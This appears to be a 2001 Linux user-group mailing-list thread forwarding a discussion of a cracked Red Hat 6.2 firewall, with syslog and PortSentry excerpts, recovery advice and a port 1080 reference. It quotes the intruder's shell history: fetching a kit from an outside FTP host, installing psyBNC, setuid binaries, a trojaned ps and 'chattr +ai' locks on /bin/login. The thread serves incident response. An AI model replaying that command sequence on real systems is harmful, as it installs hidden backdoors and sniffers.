[CLUE-Tech] Fwd: Re: blitznet crack attack

jimintriglia at americanisp.net jimintriglia at americanisp.net
Fri Jun 15 07:54:42 MDT 2001 

Doing some homework... re: #3 - port 1080 connect attempts:

http://www.sans.org/newlook/resources/IDFAQ/socks.htm

-JimI.

> Greetings All,
> 
> Interesting post/info on the PortSentry mailist (see what follows) re: another
> successfull crack that PortSentry caught after the fact (the damage was done).
> 
> For Discussion:
> 
> 1) .bash_history that is being reviewed in the post... would that file be
> located in the /home/daemon directory, root user directoy of what?
> 
> 2) If PortSentry posts an AttackAlert, what/where .bash_history files should be
> viewed and inspected to see what the cracker was up to?
> 
> 3) I've seen attempts on my own system via port 1080. This is used by servers
> running as proxy servers, yes?
> 
> Bonus Questions: What did the cracker do, and how did he get in? How could this
> have been prevented?
> 
> -JimI.
> 
> Jim Intriglia
> IT Systems and Software Developer
> www.JimIntriglia.com
> 
> Forwarded Message:
> > To: jimintriglia at americanisp.net
> > From: "Jim Intriglia" <jimintriglia at hotmail.com>
> > Subject: Fwd: Re: [Abacus] blitznet hack
> > Date: Fri, 15 Jun 2001 12:39:46 
> > -----
> > 
> > 
> > 
> > >From: "J.D. Stevens" <dave at stevens.com>
> > >To: Ian Campbell <ijac79 at hotmail.com>
> > >CC: abacus at psionic.com
> > >Subject: Re: [Abacus] blitznet hack
> > >Date: Fri, 15 Jun 2001 06:19:12 -0500
> > >
> > >Disconnect from the Internet. Put in a new disk drive for the operating 
> > >system.
> > >Install the operating system of your choice. Install ALL SECURITY PATCHES.
> > >Disable any unnecessary services. Put in appropriate monitoring, blocking, 
> > >and
> > >notification software. I use Tripwire, Portsentry, and Logcheck. Change all
> > >passwords on any machines that this one could sniff. Mount the hacked disk 
> > >read
> > >only in order to extract configurations, account information, etc.
> > >
> > >Be sure to check any systems accessible from or through the hacked machine. 
> > >Who
> > >knows what they picked up with the sniffer.
> > >
> > >Hackers got into my RH 6.2 machine in January through wu-ftd. I had it
> > >configured properly, but didn't get a security patch in soon enough. After 
> > >I
> > >rebuilt, they tried many more times to break in. So far so good. There are
> > >several vulnerabilities in RH 6.2 as it comes out of the box. The Red Hat 
> > >web
> > >site has information on steps to take to secure the system.
> > >
> > >My server is a leased system at Rackspace. They provided excellent support 
> > >after
> > >the hack. They provided the suggestion to put in the new drive and mount 
> > >the old
> > >one read-only. They had the new drive and OS installed within four hours of 
> > >my
> > >call. It took me an additional 14 hours to reconfigure the system. I do all 
> > >of
> > >the work remotely. I've never seen or touched the server.
> > >
> > >   Good luck,
> > >
> > >   Dave Stevens
> > >   STEVENS.COM, Inc.
> > >   Houston, TX, USA
> > >
> > >Ian Campbell wrote:
> > > >
> > > > Well, got a bit of shock this morning when I couldn't ssh into the 
> > >firewall at
> > > > a client site.  I got one of the techs there to have a look and sure 
> > >enough at
> > > > the login was the message "eth0 running in promiscous mode'  Not a good 
> > >start.
> > > >
> > > > The logs shows a lot of things that I don't want to see.
> > > >
> > > >
> > > >
> > > > Jun 15 04:54:33 gw inet: inetd shutdown succeeded
> > > >
> > > > Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete 
> > >config
> > > > entry (skipped)
> > > >
> > > > Jun 15 04:54:34 gw inet: inetd startup succeeded
> > > >
> > > > Jun 15 04:55:17 gw inet: inetd shutdown succeeded
> > > >
> > > > Jun 15 04:55:17 gw inet: inetd startup succeeded
> > > >
> > > > Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon 
> > >by
> > > > (uid=0)
> > > >
> > > > Jun 15 05:01:55 gw modprobe: Note: /etc/conf.modules is more recent than
> > > > /lib/modules/2.2.14-5.0/modules.dep
> > > >
> > > > Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module net-pf-10
> > > >
> > > > Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user daemon
> > > >
> > > > Jun 15 05:03:07 gw PAM_pwdb[5642]: (su) session opened for user daemon 
> > >by
> > > > (uid=0)
> > > >
> > > > Jun 15 05:03:09 gw modprobe: Note: /etc/conf.modules is more recent than
> > > > /lib/modules/2.2.14-5.0/modules.dep
> > > >
> > > > Jun 15 05:03:09 gw modprobe: modprobe: Can't locate module net-pf-10
> > > >
> > > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host:
> > > > proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
> > > >
> > > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Host 130.227.3.123 has 
> > >been
> > > > blocked via wrappers with string: "ALL: 130.227.3.123"
> > > >
> > > > Jun 15 05:04:00 gw portsentry[682]: attackalert: Host 130.227.3.123 has 
> > >been
> > > > blocked via dropped route using command: "/sbin/ipchains -I input -s
> > > > 130.227.3.123 -j DENY -l"
> > > >
> > > > Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:04:09 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48556 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:04:21 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=49656 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:04:45 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=51276 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:07:12 gw modprobe: Note: /etc/conf.modules is more recent than
> > > > /lib/modules/2.2.14-5.0/modules.dep
> > > >
> > > > Jun 15 05:07:12 gw modprobe: modprobe: Can't locate module net-pf-10
> > > >
> > > > Jun 15 05:07:20 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64668 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:07:23 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64878 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:07:29 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=65170 F=0x4000 T=48 
> > >SYN
> > > > (#1)
> > > >
> > > > Jun 15 05:07:41 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=256 F=0x4000 T=48 SYN 
> > >(#1)
> > > >
> > > > Jun 15 05:08:05 gw kernel: Packet log: input DENY eth1 PROTO=6
> > > > 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=1618 F=0x4000 T=48 
> > >SYN (#1)
> > > >
> > > > Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user daemon
> > > >
> > > > Jun 15 05:17:48 gw kernel: libtty uses obsolete (PF_INET,SOCK_PACKET)
> > > >
> > > > Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
> > > >
> > > > Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
> > > >
> > > >
> > > > .bash_history shows what they were up to
> > > >
> > > > ls -al
> > > > pico /etc/inetd.conf
> > > > /etc/et
> > > > /etc/rc.d/init.d/inet restart
> > > > cd /lib/libx.so
> > > > ls -al
> > > > mv xp mountd
> > > > chmod +xs mountd
> > > > ls -al
> > > > ftp h9.s5.com
> > > > ls -al
> > > > hostname
> > > > gunzip *.gz
> > > > ls -al
> > > > tar -xvf blitznet.tar
> > > > tar -xvf psyBNC2.2.1.tar
> > > > ls -al
> > > > rm *.tar
> > > > chown daemon psybnc
> > > > chgrp daemon psybnc
> > > > cd psybnc
> > > > make
> > > > chown daemon *
> > > > chgrp daemon *
> > > > su daemon
> > > > locate bnc
> > > > locate psybnc
> > > > find / -name psybnc
> > > > cd /
> > > > locate bnc
> > > > cd /lib/libx.so
> > > > ls -al
> > > > cd psybnc
> > > > su daemon
> > > > ls -al
> > > > cd ..
> > > > ls -al
> > > > mv lib libtty
> > > > chmod +x libtty ps
> > > > chmod +xs wipe
> > > > ls -al
> > > > ./ps psybnc libtty mountd hellnine slice2
> > > > chattr +ai /bin/ps
> > > > chattr +ai /bin/.ps
> > > > chattr +ai /bin/login
> > > > ls -al
> > > > ./libtty
> > > > ps -aux
> > > > ls -al
> > > > uptime
> > > > exit
> > > >
> > > >
> > > > So, I'm still not sure how they actually got in.  The box is running 
> > >redhat
> > > > 6.2 without any patches.  What now.  How can I  clean my system?
> > > >
> > > > Should I be upgrading my inetd version?  Can anyone offer any advice or 
> > >point
> > > > me to security list that can?
> > > >
> > > > Going to be a busy day.
> > > >
> > > > Ian
> > > >
> > > > 
> > >------------------------------------------------------------------------------
> > > > Get Your Private, Free E-mail from MSN Hotmail at 
> > >http://www.hotmail.com.
> > > >
> > > > _______________________________________________
> > >
> > >--
> > >=====================================================================
> > >Dave Stevens      |    dave at stevens.com   |    http://www.stevens.com
> > >STEVENS.COM, Inc. |      713-419-0313     | http://www.prettygood.net
> > >                   |    Houston, TX, USA   |
> > >=====================================================================
> > >_______________________________________________
> > 
> > _________________________________________________________________
> > Get your FREE download of MSN Explorer at http://explorer.msn.com
> > 
> > 
> 
> 
> _______________________________________________
> CLUE-Tech mailing list
> CLUE-Tech at clue.denver.co.us
> http://clue.denver.co.us/mailman/listinfo/clue-tech
> 


Jim Intriglia
IT Systems and Software Developer
www.JimIntriglia.com

More information about the clue-tech mailing list